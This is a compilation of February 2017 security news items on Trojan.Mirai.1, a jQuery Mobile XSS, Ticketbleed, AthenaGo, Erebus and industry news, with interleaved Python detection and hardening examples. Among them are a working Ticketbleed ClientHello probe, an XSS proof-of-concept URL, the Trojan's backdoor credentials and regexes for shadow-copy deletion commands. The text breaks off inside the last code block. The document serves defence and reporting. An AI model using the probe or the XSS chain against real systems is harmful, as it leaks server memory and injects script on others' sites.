Back to the present, the researchers from Dr. Web dubbed the threat Trojan.Mirai.1.

“A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.” states Dr. Web.

“When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports.”

Unlike the original Mirai Linux malware, Trojan.Mirai.1 scans more ports.

“The Trojan can address the following ports:

* 22
* 23
* 135
* 445
* 1433
* 3306
* 3389”
When Trojan.Mirai.1 succeeds in compromising a new device, if the device runs Linux it executes a series of commands that end with the creation of a new Mirai DDoS bot; if the compromised device runs Windows, it drops a copy of itself.

“It also creates a DBMS user with the login Mssqla and the password Bus3456#qwein, and grants it sysadmin privileges. Acting under the name of this user and with the help of the SQL server event service, various tasks are executed.” continues the analysis.

“The only exception is a connection via RDP protocol: in this case, none of the instructions are executed. Besides that, while connecting to the Linux device via Telnet protocol, it downloads a binary file on the compromised device, and this file subsequently downloads and launches Linux.Mirai.”

Below are some Trojan.Mirai.1 SHA1 hashes:

9575d5edb955e8e57d5886e1cf93f54f52912238
f97e8145e1e818f17779a8b136370c24da67a6a5
42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
938715263e1e24f3e3d82d72b4e1d2b60ab187b8
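Both write-ups of Trojan.Mirai.1 (the one above and the earlier "New Windows Trojan Spreads MIRAI Malware" piece) describe the same observable: a single Windows host inside the network walking a list of addresses and probing the fixed port set 22, 23, 135, 445, 1433, 3306 and 3389. That fan-out is easy to catch in firewall or flow logs. The detector below is an added example written for this page, not Dr.Web's tooling; the log line format ("<timestamp> <src> -> <dst>:<port> <flags>") is an assumption standing in for whatever your firewall emits, and the sample lines are constructed.

```python
"""Flag internal hosts sweeping the Trojan.Mirai.1 port set.
Added detection example; SAMPLE_LOG is constructed, not a real capture."""
from collections import defaultdict
from datetime import datetime, timedelta

# Port list from the Dr.Web analysis of Trojan.Mirai.1.
MIRAI_PORTS = {22, 23, 135, 445, 1433, 3306, 3389}

# Constructed sample: 10.0.0.7 sweeps five of the ports in seconds; 10.0.0.9 just uses SSH.
SAMPLE_LOG = """\
2017-02-09T10:00:01 10.0.0.7 -> 10.0.1.5:22 SYN
2017-02-09T10:00:01 10.0.0.7 -> 10.0.1.5:23 SYN
2017-02-09T10:00:02 10.0.0.7 -> 10.0.1.5:1433 SYN
2017-02-09T10:00:02 10.0.0.7 -> 10.0.1.6:3306 SYN
2017-02-09T10:00:03 10.0.0.7 -> 10.0.1.6:3389 SYN
2017-02-09T10:00:05 10.0.0.9 -> 10.0.1.5:22 SYN
2017-02-09T10:05:00 10.0.0.9 -> 10.0.1.5:22 SYN
2017-02-09T11:30:00 10.0.0.7 -> 10.0.1.5:445 SYN
"""


def parse_line(line: str):
    """Split one assumed-format log line into (timestamp, src_ip, dst_ip, dst_port)."""
    ts, src, _arrow, dst, _flags = line.split()
    host, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, host, int(port)


def find_scanners(log_text: str, window=timedelta(minutes=10), min_ports=3) -> dict:
    """Return {src_ip: sorted distinct Mirai ports} for every source that touched at
    least `min_ports` distinct ports of the set within one sliding `window`.

    Distinct ports, not connection count, is the signal: a busy admin box reuses
    port 22 all day, whereas the Trojan's scanner fans out across the whole list.
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, _host, port = parse_line(line)
        if port in MIRAI_PORTS:
            events[src].append((ts, port))
    findings = {}
    for src, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            ports = {p for t, p in evs[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                findings[src] = sorted(ports)
                break
    return findings


if __name__ == "__main__":
    print(find_scanners(SAMPLE_LOG))
```

A hit on an internal source is worth more than the same pattern from the internet: the whole point of the Windows component is to reach devices that are not exposed externally, so the scanning host is itself a compromised machine and a pivot for the follow-on Telnet and database-account abuse described above.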


5 Anti-Surveillance tools that can help you enhance online security and privacy
9.2.2017 securityaffairs Safety

The current digital era is filled with all sorts of cyber dangers. The following tools will help you remain safe by enhancing your online security and privacy.
There are many software tools that can help you preserve and protect your privacy online. For your benefit, I’ve compiled a list of the top 5 software tools that can help you protect your online privacy and security.

DuckDuckGo: Privacy Search Engine
DuckDuckGo was launched in 2008 as an alternative search engine that respects user privacy and claims to offer a “superior search experience with smarter answers.” It is one of the most popular search engines that provide real privacy and smarter search without tracking user activity.

This search engine does not log or share any personally identifiable information. DuckDuckGo does not use cookies to track users, immediately discards users' IP addresses, and keeps no record of the searches performed.

PureVPN: VPN Software
PureVPN is a highly regarded Hong Kong-based VPN service offering an unusually wide range of software clients for different platforms, including Windows, Mac and Ubuntu Linux, mobile apps for Android and iOS, and manual configuration for Windows Phone.

PureVPN operates a self-managed VPN network that currently stands at 750+ servers in 141 countries, including seldom-covered areas such as Oceania, Africa and Central America. It provides an extra layer of privacy: the company states that it does not collect or log your online activities and does not monitor what you do online.

PureVPN supports a wide variety of VPN protocols, including OpenVPN, IPsec/L2TP, PPTP, SSTP and IKEv2, and encrypts all of your internet traffic with 256-bit encryption to protect your data and online activities. Note that PPTP is offered for compatibility only: its MS-CHAPv2 authentication is known to be breakable, so prefer OpenVPN or IKEv2 when privacy matters.

ProtonMail: Email Encryption Software
ProtonMail is a free end-to-end encrypted email service that keeps your data safe. It is also available on smartphones through dedicated apps for Android and iOS. Messages exchanged between ProtonMail users are end-to-end encrypted, so your emails and contacts stay private.


Cryptocat: Secure Chat software
Cryptocat is a secure chat application for your computer that allows you to chat with your friends in complete privacy. Every message you send via the app is secured with end-to-end encryption, which ensures that all of your communications with other Cryptocat users remain protected.

This open source desktop application is available for Windows, OS X and Linux. With it you can also share encrypted files, pictures and videos with your buddies safely and easily, and Cryptocat users can receive messages even when they’re offline.

HTTPS Everywhere: Privacy Browser Extension
HTTPS Everywhere is a free extension available for Chrome, Firefox and Opera, developed by the Electronic Frontier Foundation (EFF) in collaboration with the Tor Project. It rewrites your requests to use HTTPS instead of plain HTTP on the many websites that support it, encrypting your communications with those sites.

We hope that the tools above will help you increase your online privacy and security. If you have any suggestions that you think are worth adding to this list, feel free to let us know.

About Author (Anas Baig):

Anas Baig is a digital marketer and security enthusiast who loves to read and write about digital security, and tweets about marketing and security.


jQuery Mobile Can Expose Websites to XSS Attacks

9.2.2017 securityweek Attack
A Google security engineer discovered that jQuery Mobile can expose websites to cross-site scripting (XSS) attacks if an open redirect vulnerability is also present.

The jQuery Foundation’s jQuery Mobile project is an HTML5-based user interface system designed for developing responsive websites and web applications that can be accessed from any type of device. According to BuiltWith, jQuery Mobile is currently used on more than 150,000 active websites.

Google’s Eduardo Vela discovered a few months ago that jQuery Mobile checks location.hash, which holds the anchor part of a URL. If location.hash contains a URL, the framework calls history.pushState with it and then issues an XMLHttpRequest to it. The response to this request is written into the page with innerHTML.

The use of history.pushState should prevent XSS attacks, since the browser refuses cross-origin URLs there, but exploitation is still possible if the website is affected by an open redirect vulnerability. An example provided by Vela looks like this:

http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html

There may be many websites vulnerable to such attacks considering that some organizations, including Google, don’t treat open redirects as vulnerabilities. Open redirects can be found on major websites such as Google, YouTube, Facebook, Baidu and Yahoo.

The expert reported his findings to jQuery Mobile developers, but the problem will not be addressed any time soon due to concerns that changing the current behavior could break existing applications. The jQuery team has admitted that developers should be warned about the risks.

“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn't work out,” Vela wrote in a post on his personal blog.

“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs,” the researcher said.
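The two write-ups above (this one and the securityaffairs piece on the same finding) leave the site owner with two things to do: follow the jQuery Mobile team's advice and refuse to redirect any request that arrived via XHR, and close the open redirect itself. The handler below is an added example written for this page, not code from jQuery Mobile or from Vela. It models the request as a plain dict (an assumption standing in for your framework's request object), assumes the site's own host is example.com, and returns the status and headers it would send.

```python
"""Redirect endpoint hardened against the jQuery Mobile hash-fetch XSS chain.
Added example for this page; the request shape and SITE_HOST are assumptions."""
from urllib.parse import urlsplit

SITE_HOST = "example.com"  # assumption: the only host we are willing to redirect to


def is_local_target(url: str) -> bool:
    """True only for same-site targets: relative paths or absolute http(s) URLs on SITE_HOST.

    Rejects the usual open-redirect bypasses: protocol-relative "//evil", the
    backslash variant "/\\evil" that browsers normalise to "//evil", other schemes
    such as javascript:, and hosts that merely contain or prefix our name.
    """
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        return url.startswith("/") and not url.startswith("//") and not url.startswith("/\\")
    return parts.scheme in ("http", "https") and parts.hostname == SITE_HOST


def handle_redirect(request: dict):
    """request = {"path": "/redirect", "query": {"url": ...}, "headers": {...}}
    Returns (status_code, response_headers)."""
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    target = request.get("query", {}).get("url", "")

    # 1) jQuery Mobile loads hash targets with $.ajax, which marks same-origin
    #    requests with X-Requested-With. A redirect is never served to such a fetch,
    #    so the XHR can never be steered to attacker HTML (the jQuery team's advice).
    if headers.get("x-requested-with") == "XMLHttpRequest":
        return 403, {}

    # 2) Close the open redirect itself: browsers (and the XHR) follow Location
    #    cross-origin, so only same-site targets are ever emitted.
    if not is_local_target(target):
        return 403, {}
    return 302, {"Location": target}


if __name__ == "__main__":
    demo = {"path": "/redirect", "query": {"url": "http://sirdarckcat.github.io/xss/img-src.html"},
            "headers": {"X-Requested-With": "XMLHttpRequest"}}
    print(handle_redirect(demo))
```

Step 2 is the one that actually removes the bug: the header check only covers same-origin XHR (jQuery does not add X-Requested-With to cross-domain requests, and a plain navigation never carries it), so on its own it leaves the open redirect available to every other abuse.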


"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks

9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that can be exploited by a remote attacker to extract memory. An Internet scan showed that hundreds of hosts had been exposed by the flaw.

The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.

According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.

As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of chunks of up to 64 kilobytes – which means an attack requires many more rounds – and it is specific to F5 products.

The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.

“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.

“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.
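The mechanism Valsorda describes, as an added example that is neither his scanner nor F5 code: build a TLS 1.2 ClientHello that attempts ticket resumption with a deliberately short session ID, then parse the ServerHello and compare the echoed session ID with the one sent. The ticket bytes are a placeholder; a real check first completes a full handshake to obtain a ticket the server will accept and then replays it over TCP/443 with a hello built like this one. The ServerHello used here is constructed so the block runs offline.

```python
import os
import struct

TLS_HANDSHAKE = 0x16
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02
EXT_SESSION_TICKET = 0x0023
TLS12 = b"\x03\x03"


def build_client_hello(session_id: bytes, ticket: bytes,
                       cipher_suites=(0xC02F, 0x009C, 0x002F)) -> bytes:
    """TLS record holding a ClientHello with `session_id` (1..32 bytes) in the
    legacy session_id field and `ticket` in the session_ticket extension."""
    if not 1 <= len(session_id) <= 32:
        raise ValueError("session_id must be 1..32 bytes")
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    ext = struct.pack("!HH", EXT_SESSION_TICKET, len(ticket)) + ticket
    body = (TLS12 + os.urandom(32)                        # version, random
            + bytes([len(session_id)]) + session_id        # session_id
            + struct.pack("!H", len(suites)) + suites      # cipher_suites
            + b"\x01\x00"                                  # compression: null only
            + struct.pack("!H", len(ext)) + ext)           # extensions
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE]) + b"\x03\x01" + struct.pack("!H", len(hs)) + hs


def hello_session_id(record: bytes, hs_type: int) -> bytes:
    """session_id field of a ClientHello or ServerHello. Both start with
    version(2) random(32) session_id_len(1) session_id, so one parser serves."""
    if record[0] != TLS_HANDSHAKE:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != hs_type:
        raise ValueError("unexpected handshake type %#x" % hs[0])
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    sid_len = body[34]
    return body[35:35 + sid_len]


def ticketbleed_verdict(sent_session_id: bytes, server_hello: bytes) -> dict:
    """Vulnerable when the echoed session_id starts with what we sent but is
    longer: the extra tail is server memory the client never supplied."""
    echoed = hello_session_id(server_hello, SERVER_HELLO)
    leak = echoed.startswith(sent_session_id) and len(echoed) > len(sent_session_id)
    return {"echoed_len": len(echoed),
            "leaked": echoed[len(sent_session_id):] if leak else b"",
            "vulnerable": leak}


def make_server_hello(session_id: bytes) -> bytes:
    """Constructed ServerHello standing in for a real server's response."""
    body = (TLS12 + os.urandom(32) + bytes([len(session_id)]) + session_id
            + b"\xC0\x2F" + b"\x00")                       # cipher_suite, compression
    hs = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE]) + TLS12 + struct.pack("!H", len(hs)) + hs


if __name__ == "__main__":
    sent = b"\x01"
    hello = build_client_hello(sent, ticket=b"\x00" * 48)
    print("ClientHello record:", len(hello), "bytes")
    # Emulate a stack that always echoes 32 bytes, the behaviour the article describes
    leaky = make_server_hello(sent + os.urandom(31))
    print(ticketbleed_verdict(sent, leaky))
```

A server that rejects the ticket falls back to a full handshake and issues a fresh session ID, which with a 1-byte probe happens to start with the same byte one time in 256; repeat the probe with different session IDs, or additionally confirm the handshake was abbreviated (no Certificate message), before calling a host vulnerable.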

Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.

Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.


Government Contractor Indicted Over Theft of Secret Documents

9.2.2017 securityweek BigBrothers
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.

Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.

According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.

The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.

Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).

“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.

Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.

While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.

At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.


AthenaGo RAT Uses Tor2Web for C&C Communication

9.2.2017 securityweek Virus
A newly observed Remote Access Trojan (RAT) targeting Windows systems is using Tor2Web proxies for communication with the command and control (C&C) server, Cisco Talos security researchers warn.

The RAT was written in Go, which is rather unusual for Windows malware, and its author refers to it as Athena, which led the researchers to name it AthenaGo. Besides relying on Tor2Web proxies for communication, the Trojan can download and run additional binaries on the infected system, Cisco Talos threat researcher Edmund Brumaghin explains.

The malware is distributed via macro-enabled Word documents, an increasingly popular delivery method that was recently used to drop macOS malware as well. The malicious documents distributing AthenaGo appear to be targeting Portuguese-speaking users, as the message that instructs potential victims to enable macros is written in Portuguese.

AthenaGo, one of the few Windows malware families to have been written in Go, comes with two hardcoded domains that it connects to post-infection. Both utilize Tor2Web, a project that allows access to resources on the Tor (The Onion Router) network even if the requesting client system isn’t part of the network.

“Tor2Web servers act as proxies and allow clients to access servers hosting content on Tor without requiring the installation of a local Tor client application. This approach has shown to be increasingly attractive to cybercriminals. The use of Tor2Web and Tor in general allows them to stay anonymous. It also makes it much more difficult to remove malicious content being hosted on servers within Tor, as it is difficult to identify where a Tor server is hosted physically,” the security researcher explains.

During the initial infection process, AthenaGo generates an RSA key pair that is used to communicate with the C&C server, after which it makes two HTTP HEAD requests to the two hardcoded servers.

The malware supports several commands that it executes when instructed by the C&C server: ListDir (lists directories on the infected system), ListProcesses (generates a list of processes), KillProcess (runs the taskkill command against a target process), DownloadFile (downloads and saves a file), DLRUN (downloads a file, saves it to %TEMP% and executes it), and RunCMD (executes system commands on the infected system using Go's os/exec package).
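The Tor2Web beaconing described above, as an added detection example that is neither AthenaGo code nor Talos' analysis: a heuristic run over constructed proxy log lines that flags requests to Tor2Web gateway hostnames and reports clients that issued HEAD requests to two or more distinct onion services through them. Tor2Web gateways expose an onion service as `<onion-address>.onion.<tld>` or `<onion-address>.tor2web.<tld>`; the article names neither the two hardcoded domains nor the gateways, so the suffix pattern and the log format are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Onion address (16-char v2 or 56-char v3 base32 label) followed by a Tor2Web
# gateway suffix such as .onion.to, .onion.link or .tor2web.org (assumption).
TOR2WEB_HOST = re.compile(
    r"^(?P<onion>[a-z2-7]{16}|[a-z2-7]{56})\.(?:onion|tor2web)\.[a-z]{2,}(?:\.[a-z]{2,})?$",
    re.I)
# Constructed proxy log format: <timestamp> <client> <method> <url> <status>
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def tor2web_hits(lines):
    """Map client -> [(method, onion_address, host)] for every Tor2Web request."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        host = urlsplit(m["url"]).hostname or ""
        t = TOR2WEB_HOST.match(host)
        if t:
            hits[m["client"]].append((m["method"], t["onion"].lower(), host))
    return dict(hits)


def beacon_like(hits, min_onions=2, method="HEAD"):
    """Clients that sent `method` requests to at least `min_onions` distinct onion
    services via Tor2Web, the check-in pattern the article describes for AthenaGo."""
    return sorted(client for client, reqs in hits.items()
                  if len({onion for mth, onion, _ in reqs if mth == method}) >= min_onions)


SAMPLE_LOG = [  # constructed for this example
    "2017-02-09T10:00:01Z 10.0.0.12 HEAD http://ab3cd4ef5gh6ij7k.onion.to/ 200",
    "2017-02-09T10:00:02Z 10.0.0.12 HEAD http://zyx2wvu3tsr4qpo5.tor2web.org/ 200",
    "2017-02-09T10:00:05Z 10.0.0.12 GET http://ab3cd4ef5gh6ij7k.onion.to/api/task 200",
    "2017-02-09T10:01:00Z 10.0.0.33 GET http://www.example.com/ 200",
    "2017-02-09T10:01:09Z 10.0.0.33 GET http://onion.to/ 200",
]

if __name__ == "__main__":
    hits = tor2web_hits(SAMPLE_LOG)
    for client, reqs in hits.items():
        print(client, reqs)
    print("beacon-like clients:", beacon_like(hits))
```

Blocking the gateway suffixes outright is the cheaper control where there is no business use for Tor2Web; the grouping logic is what turns a single hit into a triage-worthy alert when blocking is not an option.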

“Malware authors will continue to evolve their attacks as they identify ways to effectively reduce their risk of being caught. This includes relying on C&C infrastructure hosted on Tor, making use of varying levels of encryption to protect the nature and content of network communications with their malware, and limiting their attacks to targeted attacks against specific targets or demographics. AthenaGo is an example of changes in the way malware is being written in an attempt to evade network defenses and successfully compromise target environments,” Cisco Talos’ researcher concludes.


Firms Increasingly Interested in Cyber Insurance: Study

9.2.2017 securityweek Cyber
Companies in the United States, the United Kingdom and Germany are increasingly interested in taking out cyber insurance, according to a new study commissioned by insurance provider Hiscox.

The cyber security readiness study, which involved 3,000 businesses from the three countries, shows that 30% of companies in Germany, 36% in the U.K. and 55% in the U.S. already have cyber insurance. Roughly 30% of the firms that don’t have insurance plan on getting insured in the next 12 months.

The top reasons for taking out cyber insurance are related to the cost of a potential breach and the need for peace of mind, data security concerns, the possibility of customer action, and new data regulations. In roughly one-quarter of cases, cyber insurance is a legal requirement.


More than half of the respondents reported being hit by at least one cyberattack in the last 12 months and the cost of dealing with an incident has been significant. On average, companies in the United States with over 1,000 employees said the largest cyber incident had cost them more than $100,000.

In the case of small U.S. firms, with fewer than 100 employees, the average cost was roughly $35,000. Depending on their size, organizations in the U.K. reported costs between approximately $32,000 and $67,000, and organizations in Germany between approximately $24,000 and $48,000.

The study shows that larger organizations are more likely to be interested in cyber insurance, and financial services is the most insurance-aware sector, with more than half of respondents already having cyber insurance.

Experts pointed out that Germany has been increasingly interested in cyber insurance since the attack on its parliament in 2015. Organizations in Europe are also looking for cyber insurance as a result of the EU’s new data protection regulations, which will take effect in 2018.

Of the companies that do not intend to get cyber insurance, many said the insurance policies are too complicated, they are not exactly sure what cyber insurance is, or they don’t trust the insurer to pay out in the event of an incident.

According to a report published by Allied Market Research (AMR) in December, the global cyber insurance market is expected to reach $14 billion by 2022, growing at a compound annual rate of roughly 28 percent from 2016.

In the meantime, some security companies have started providing alternatives to the traditional insurance services. San Francisco-based security consulting firm AsTech announced this week that it will be offering a $1 million warranty against breach-related costs if a customer is hacked as a result of a vulnerability that AsTech fails to discover. Endpoint security firm SentinelOne offered similar guarantees last year.


U.S. Queries PayPal in Money Laundering Probe

9.2.2017 securityweek IT
San Francisco - US authorities have demanded information from online payment service PayPal as part of a money laundering investigation, according to a regulatory filing available on Wednesday.

"We have received subpoenas from the US Department of Justice seeking the production of certain information related to our historical anti-money laundering program," Silicon Valley-based PayPal said in an annual report to the US Securities and Exchange Commission.

PayPal noted that it was cooperating with authorities and did not speculate on the outcome of the investigation. No further details were provided.

The news appeared to weigh slightly on PayPal shares, which were down more than 1.5 percent to $40.24 in after-market trades on the Nasdaq.


HackerOne Penetrates VC Pockets for $40 Million

9.2.2017 securityweek Security
Bug bounty platform provider HackerOne announced on Wednesday that it has raised $40 million in a Series C financing round led by Dragoneer Investment Group.

The San Francisco-based startup offers a software-as-a-service platform that provides the technology and automation to help organizations run their own vulnerability management and bug bounty programs.

The company says the new funds will be used to invest in technology development, expand market reach, and strengthen its hacker community of more than 100,000 white hat hackers.


The company was co-founded by Alex Rice, the company’s CTO and the man behind Facebook’s bug bounty program, Merijn Terheggen, who serves as CEO, Jobert Abma (tech lead) and Michiel Prins (product lead). HackerOne gained publicity in November 2013 when it announced hosting the Internet Bug Bounty project funded by Microsoft and Facebook.

According to the security startup, more than 38,000 security vulnerabilities have been resolved across more than 700 HackerOne customers, with more than $14 million in bug bounties awarded to date, $7 million of which was awarded in 2016.

In 2016, the U.S. Department of Defense (DoD) selected HackerOne to run the U.S. federal government's first bug bounty challenge, Hack the Pentagon, which HackerOne says resolved more than 138 vulnerabilities discovered by 1,400 hackers.

In October 2016 the DoD announced that it awarded a combined $7 million to HackerOne and Synack for helping the organization’s components launch their own bug bounty initiatives. With $3 million awarded to HackerOne, the company will help the DoD run challenges similar to Hack the Pentagon, while Synack will provide assistance for a private program open only to highly vetted researchers, the DoD said, adding that the private program will focus on the Pentagon’s sensitive IT assets.

Other HackerOne customers include Airbnb, CloudFlare, General Motors, GitHub, New Relic, Nintendo, Qualcomm, Starbucks, Uber and Lufthansa.

“Our customers typically receive their first valid security vulnerability report the same day they challenge our diverse community of hackers to examine their code,” said Marten Mickos, CEO of HackerOne. “There’s no such thing as perfect software and bug bounty programs are the most efficient and cost-effective solution for finding security vulnerabilities in live software.”

NEA, Benchmark and Strategic Investors also participated in the Series C round.


Rockwell Automation Teams With Claroty on Industrial Network Security

9.2.2017 securityweek Security
Rockwell Automation this week announced that it is teaming up with industrial cybersecurity startup Claroty, combining the two companies' security products and services into future joint security offerings.

Rockwell, an industrial automation giant with more than 22,000 employees, said that after a competitive review process it selected Claroty for its anomaly-detection software purpose built for industrial network security.

Armed with $32 million in funding through Series A and Series B rounds, Claroty exited stealth mode in September 2016 to announce a security platform designed to provide “extreme visibility” into Operational Technology (OT) environments and protect critical infrastructure from cyber threats.

Claroty has built a platform that provides broad support for control system manufacturers and employs “high-fidelity models and advanced algorithms” to monitor industrial control systems (ICS) communications and provide security and process integrity alerts. The platform can inspect a large number of industrial control protocols; with support for both open and proprietary protocols from vendors including Siemens, Rockwell Automation/Allen Bradley, Yokogawa, Emerson, GE, Schneider Electric, Mitsubishi, Honeywell, ABB and more.

“More connected control systems combined with the potential for more attacks on those systems have made cybersecurity a top concern in the industrial world,” said Scott Lapcewich, vice president and general manager, Customer Support and Maintenance, Rockwell Automation. “Claroty’s deep-visibility software platform and expertise in industrial security made the company a natural fit for substantial collaboration as we grow our existing portfolio of security service and support offerings.”

“The Claroty platform can detect a bad actor’s activities at any stage, whether they’re trying to gain a foothold on a network, conduct reconnaissance or inflict damage,” said Amir Zilberstein, co-founder and CEO, Claroty. “It also can detect human errors and other process integrity issues, which are often more common than threats from bad-actors. For example, the software monitors for critical asset changes that, if done incorrectly, could result in unexpected downtime. The system also identifies network-configuration issues that could expose a system to outside threats.”


Erebus Ransomware Bypasses UAC for Privilege Elevation

9.2.2017 securityweek Virus
A newly observed ransomware variant is using a technique to bypass User Account Control (UAC) in order to elevate its privileges without displaying a UAC prompt, researchers have discovered.

Dubbed Erebus, the malware appears to be new, though it features the same name as a piece of ransomware that emerged in late September 2016. However, the different characteristics of the two malicious apps suggest that the newly discovered variant is either a completely different malware or a fully rewritten release, BleepingComputer’s Lawrence Abrams notes.

Details on Erebus’ distribution mechanism aren’t available at the moment. What is known, however, is that the malware leverages a UAC bypass technique that was detailed in August last year and which abuses Event Viewer to infect the compromised systems without alerting the user.

To do so, the ransomware copies itself to a randomly named file in the same folder, then modifies the Windows registry to hijack the .msc file association so that it launches the randomly named Erebus file instead of the normal handler.

Next, the ransomware launches eventvwr.exe (Event Viewer), which opens eventvwr.msc and, through the .msc association, would normally start mmc.exe. Because the association now points to the randomly named Erebus executable, that executable is launched instead. Event Viewer is auto-elevated, so the executable runs with the same elevated privileges, which lets the malware bypass UAC without a prompt.

When executed, the malware connects to two different domains to determine the victim’s IP address and the country they are located in. It then downloads a Tor client and uses it to connect to its command and control (C&C) server.

The ransomware then scans the victim's computer for certain file types and encrypts them with AES. At the moment, the malware targets around 60 file types, including images and documents. The file extension is obfuscated with a ROT-23 substitution, the researcher says.

During encryption, the ransomware also clears the Windows Volume Shadow Copies, in an attempt to prevent users from restoring their files this way. As soon as the encryption process has been completed, the malware drops a ransom note on the Desktop under the name of README.HTML, and then displays it. Additionally, Erebus displays a message box on the desktop, alerting the victim that their files have been encrypted.
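The chain above, as an added detection example that is neither Erebus code nor part of BleepingComputer's write-up: a detector run over constructed Sysmon-style events for the three observable steps, the hijacked .msc handler in the registry, eventvwr.exe spawning something other than mmc.exe, and the shadow-copy deletion. The registry path checked is the one used by the August 2016 Event Viewer UAC-bypass research the article refers to, HKCU\Software\Classes\mscfile\shell\open\command; the article itself names no path, and the vssadmin/wmic command forms are likewise assumptions.

```python
import re

# (Default) value of the per-user mscfile handler; Sysmon reports HKCU keys under
# HKU\<SID>\..., so match on the tail of the path only.
MSCFILE_HANDLER = re.compile(
    r"\\software\\classes\\mscfile\\shell\\open\\command(\\\(default\))?$", re.I)
SHADOW_DELETE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)


def detect_erebus_chain(events):
    """Return (rule, evidence) tuples for events matching any step of the chain."""
    alerts = []
    for ev in events:
        if ev["event"] == "RegistryValueSet":
            # Handler rewritten to anything that is not mmc.exe
            if MSCFILE_HANDLER.search(ev["target"]) and "mmc.exe" not in ev["details"].lower():
                alerts.append(("mscfile handler hijacked", ev["details"]))
        elif ev["event"] == "ProcessCreate":
            image = ev["image"].lower()
            parent = ev.get("parent_image", "").lower()
            # Auto-elevated eventvwr.exe should only ever start mmc.exe
            if parent.endswith("\\eventvwr.exe") and not image.endswith("\\mmc.exe"):
                alerts.append(("eventvwr.exe launched an unexpected child", ev["image"]))
            if SHADOW_DELETE.search(ev.get("command_line", "")):
                alerts.append(("volume shadow copies deleted", ev["command_line"]))
    return alerts


SAMPLE_EVENTS = [  # constructed Sysmon-style records, in the order the chain runs
    {"event": "ProcessCreate", "image": r"C:\Users\victim\Downloads\invoice.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "invoice.exe"},
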